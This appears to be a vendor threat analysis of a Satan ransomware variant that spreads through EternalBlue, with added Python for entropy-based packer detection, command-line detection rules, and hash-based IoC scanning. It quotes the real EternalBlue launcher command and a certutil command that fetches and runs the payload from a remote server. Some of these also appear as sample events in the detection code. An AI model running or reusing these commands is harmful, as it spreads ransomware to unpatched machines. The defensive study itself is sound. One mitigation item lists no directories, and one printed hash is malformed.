Satan ransomware was first seen in January 2017. Like most "commodity" ransomware families, it had no self-propagation capability: it could not spread to other endpoints on an enterprise network on its own and encrypt their files. The new variant changes that by bundling the EternalBlue exploit, making it another WannaCry-style worm. It was discovered by security researchers from MalwareHunterTeam.
This variant is packed with a packer called PECompact 2. A packer compresses (or encrypts) a Portable Executable file (an .exe or .dll) and prepends a small decompression/decryption stub, producing a single executable that restores the original code in memory at run time. Many commercial and custom packers are used by malware authors today, mainly to defeat static, signature-based scanning of the file on disk; the original code only appears once the stub has run, so it has to be examined in memory or in a sandbox.
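A quick way to tell whether a sample is packed before spending analysis time on it is to look at the entropy of each PE section. The following is an added example, not code from the original post or from Cynet: it parses just enough of the PE header to locate each section's raw bytes and computes their Shannon entropy. The 7.0 bits/byte threshold and the toy PE image built inline (a low-entropy `.text` next to a pseudo-random `.packed` section) are assumptions for the demonstration, not a real binary.

```python
import hashlib
import math
import struct

ENTROPY_THRESHOLD = 7.0  # assumption: bits/byte above which a section looks compressed or encrypted


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, close to 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_sections(blob: bytes):
    """Walk the PE headers and yield (section_name, raw_bytes) for every section.

    Only the fields needed to find section data are read (e_lfanew, NumberOfSections,
    SizeOfOptionalHeader, and the section table); real triage should use pefile.
    """
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections, opt_size = struct.unpack_from("<H12xH", blob, coff + 2)
    table = coff + 20 + opt_size  # section table follows the 20-byte COFF header + optional header
    for i in range(n_sections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII16x", blob, table + 40 * i)
        yield name.rstrip(b"\0").decode("ascii", "replace"), blob[raw_ptr:raw_ptr + raw_size]


def packing_report(blob: bytes, threshold: float = ENTROPY_THRESHOLD):
    """Return ([(name, entropy, suspicious)], probably_packed) for a PE image."""
    rows = []
    for name, data in pe_sections(blob):
        h = shannon_entropy(data)
        rows.append((name, round(h, 2), h >= threshold))
    return rows, any(flag for _, _, flag in rows)


def build_sample_pe() -> bytes:
    """Constructed PE32 image for the demo (not a real program): plain ASCII in .text,
    4096 pseudo-random bytes (chained SHA-256 outputs) in .packed."""
    text = (b"plain code and strings " * 100)[:2048]
    packed = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))
    opt_size = 224  # size of a PE32 optional header
    hdr_len = (0x80 + 4 + 20 + opt_size + 2 * 40 + 0x1FF) & ~0x1FF  # round headers up to 0x200
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)  # e_lfanew: PE signature lives at offset 0x80
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x102)  # i386, 2 sections
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    s1 = struct.pack("<8sIIII16x", b".text", len(text), 0x1000, len(text), hdr_len)
    s2 = struct.pack("<8sIIII16x", b".packed", len(packed), 0x2000, len(packed), hdr_len + len(text))
    header = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + s1 + s2).ljust(hdr_len, b"\0")
    return header + text + packed


if __name__ == "__main__":
    for name, entropy, suspicious in packing_report(build_sample_pe())[0]:
        print(f"{name:10s} {entropy:5.2f} bits/byte {'<- packed?' if suspicious else ''}")
```

Entropy is a hint, not proof: compressed resources, embedded media and .NET metadata also score high, and a packer can keep the stub small so the overall file looks ordinary. Treat a high-entropy code section together with an unusual section name or a tiny import table as the signal, and confirm by unpacking in memory.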
The Infection Process:
The initial executable in the infection chain was seen under the name "sts.exe". It is a downloader: it fetches the main Satan payloads, packaged as SFX archives, from a malware distribution server whose address is embedded in the Satan code, and extracts them on the infected machine.
"sts.exe" has to be launched by the user. After downloading the payloads (Client.exe and ms.exe) it triggers a UAC prompt.
- "Client.exe" – holds the actual ransomware code and is run once the "sts.exe" UAC prompt is accepted.
- "ms.exe" – launches the EternalBlue exploit code (CVE-2017-0144, SMBv1, fixed by MS17-010), propagating Satan to unpatched endpoints so that their files are encrypted as well.
Once another machine has been compromised by the exploit, the following command is executed on it to download an additional helper payload (command taken from Blaze's Security blog):
"cmd /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp"
"down64.dll" is then loaded into memory and executes the following command:
“cmd.exe /c certutil.exe -urlcache -split -f https://22.214.171.124/cab/sts.exe c:/sts.exe&c:\sts.exe”
This drops and runs "sts.exe" on the newly compromised machine, which starts the whole chain again from there: download of Client.exe and ms.exe, encryption, and scanning for further SMBv1 targets.
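The two command lines above are the most detectable part of the chain: certutil.exe fetching a URL and the EternalBlue/DoublePulsar option syntax (blue.exe / star.exe with --TargetIp, --Function RunDLL, --DllPayload) are rare in normal process telemetry. Below is an added example, not code from the original post: a handful of regex rules run over constructed Sysmon-style process-creation events. The event shapes and the sample target IP 10.0.0.7 are made up for the demo; the two Satan command lines are the ones quoted above, written with double-hyphen options as the tools take them, and the patterns also accept the en dash that copied command lines often carry instead.

```python
import re

# Regex fragment accepting "--" or an en dash (U+2013) in front of a tool option.
DASH = r"(?:--|\u2013)"

# (event field, rule name, pattern). Match on the command line, not the image: in the
# chain above certutil runs under "cmd.exe /c", so the image alone would be cmd.exe.
RULES = [
    ("image", "satan_known_filename",
     re.compile(r"(^|\\)(sts|client|ms)\.exe$", re.I)),
    ("cmdline", "certutil_urlcache_download",
     re.compile(r"certutil(\.exe)?\b(?=.*\s-urlcache\b)(?=.*\s-split\b)(?=.*\s-f\s)", re.I)),
    ("cmdline", "eternalblue_launcher",
     re.compile(r"\bblue\.exe\b.*" + DASH + r"TargetIp\b", re.I)),
    ("cmdline", "doublepulsar_rundll_inject",
     re.compile(DASH + r"TargetPort\s+445\s+" + DASH + r"Protocol\s+SMB.*"
                + DASH + r"Function\s+RunDLL\s+" + DASH + r"DllPayload\s+\S+", re.I)),
    ("cmdline", "satan_staging_dir",
     re.compile(r"\\Alluse~1\\", re.I)),
]

# Constructed process-creation events (not real telemetry). pid 2 and 3 carry the
# Satan command lines quoted above with a sample target IP; pid 4 is benign certutil use.
EVENTS = [
    {"pid": 1, "image": r"C:\Users\bob\Downloads\sts.exe",
     "cmdline": r"C:\Users\bob\Downloads\sts.exe"},
    {"pid": 2, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp 10.0.0.7 & star.exe "
                r"--OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 "
                r"--Function RunDLL --DllPayload down64.dll --TargetIp 10.0.0.7"},
    {"pid": 3, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c certutil.exe -urlcache -split -f "
                r"https://22.214.171.124/cab/sts.exe c:/sts.exe&c:\sts.exe"},
    {"pid": 4, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -hashfile C:\tools\setup.msi SHA256"},
]


def detect(events):
    """Map pid -> names of the rules that fired, in RULES order; silent events are omitted."""
    alerts = {}
    for ev in events:
        hits = [name for field, name, pat in RULES if pat.search(ev.get(field, ""))]
        if hits:
            alerts[ev["pid"]] = hits
    return alerts


if __name__ == "__main__":
    for pid, names in detect(EVENTS).items():
        print(f"pid {pid}: {', '.join(names)}")
```

The certutil rule keys on the -urlcache -split -f combination rather than on certutil.exe itself, because certutil is a legitimate tool (pid 4 stays quiet). A single event firing two or more of the EternalBlue/DoublePulsar/staging-directory rules, as pid 2 does, is the strongest signal that a host is being used to spread.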
Indicators of Compromise:
- “sts.exe” – sha256: b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee
- “Client.exe” – md5: 94868520b220d57ec9df605839128c9
- “ms.exe” – md5: 770ddc649b8784989eed4cee10e8aa04
- “down64.dll” – md5: 17f8d5aff617bb729fcc79be322fcb67
- Known HTTP User Agent: “RookIE/1.0”
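To sweep a host or a file share for these binaries, match on hash rather than on file name, since the downloader can be dropped under any name. The following is an added example, not code from the original post: it validates the IoC list first (the Client.exe MD5 as printed above has 31 hex characters, so it can never match and is reported instead of silently used), hashes every file under a directory once for all needed algorithms, and looks each digest up. The scanned files and the extra "constructed-sample" IoC are constructed inline for the demo.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# File hashes as listed above: name -> (algorithm, hex digest).
SATAN_IOCS = {
    "sts.exe":    ("sha256", "b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee"),
    "Client.exe": ("md5",    "94868520b220d57ec9df605839128c9"),
    "ms.exe":     ("md5",    "770ddc649b8784989eed4cee10e8aa04"),
    "down64.dll": ("md5",    "17f8d5aff617bb729fcc79be322fcb67"),
}

DIGEST_HEX_LEN = {"md5": 32, "sha256": 64}


def validate_iocs(iocs):
    """Split IoCs into usable {algo: {digest: name}} and rejected {name: digest}.

    A digest with the wrong length or non-hex characters is rejected: a scanner that
    loads it anyway would report "no hits" while never having been able to match.
    """
    usable, rejected = {}, {}
    for name, (algo, hexd) in iocs.items():
        hexd = hexd.strip().lower()
        if algo in DIGEST_HEX_LEN and re.fullmatch(r"[0-9a-f]{%d}" % DIGEST_HEX_LEN[algo], hexd):
            usable.setdefault(algo, {})[hexd] = name
        else:
            rejected[name] = hexd
    return usable, rejected


def file_digests(path, algos):
    """Read the file once and return {algo: hexdigest} for every requested algorithm."""
    hashers = {a: hashlib.new(a) for a in algos}
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            for h in hashers.values():
                h.update(chunk)
    return {a: h.hexdigest() for a, h in hashers.items()}


def scan_tree(root, iocs):
    """Return ([(file name, algo, IoC name)], rejected IoCs) for all files under root."""
    usable, rejected = validate_iocs(iocs)
    hits = []
    for p in sorted(Path(root).rglob("*")):
        if not p.is_file():
            continue
        digests = file_digests(p, usable)
        for algo, table in usable.items():
            name = table.get(digests[algo])
            if name:
                hits.append((p.name, algo, name))
    return hits, rejected


def demo():
    """Constructed scan: a temp directory holding a benign file and a renamed copy of a
    stand-in 'sample' whose MD5 is added to the IoC set, so the hit is by content only."""
    sample = b"constructed stand-in for a Satan binary, not real malware\n"
    iocs = dict(SATAN_IOCS)
    iocs["constructed-sample"] = ("md5", hashlib.md5(sample).hexdigest())
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "sub").mkdir()
        (root / "readme.txt").write_bytes(b"nothing to see here\n")
        (root / "sub" / "svchost_update.exe").write_bytes(sample)  # dropped under another name
        return scan_tree(root, iocs)


if __name__ == "__main__":
    hits, rejected = demo()
    print("hits:", hits)
    print("rejected IoCs (check the source):", rejected)
```

Hash matching only catches the exact samples listed here; the packed binaries are trivially re-built with a different hash, so pair this sweep with the command-line and User-Agent indicators rather than relying on it alone.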
Tips for Mitigation:
- The Cynet Endpoint scanner detects/remediates this threat and its additional binaries at runtime.
- Keep your systems patched. In particular, apply MS17-010 (the fix for CVE-2017-0144) and disable SMBv1 where it is not needed; that exploit is this variant's propagation path.
- The following directories should be examined:
- Make sure UAC is enabled, so that "sts.exe" cannot elevate silently; the unexpected elevation prompt is the user's chance to stop the infection.
- Restrict write access to network shares with ACLs (least privilege), which limits what an infected account can encrypt.
- Block the network indicators (the distribution server and the "RookIE/1.0" User-Agent) on organizational firewalls and proxies, and alert on certutil.exe being used to fetch URLs.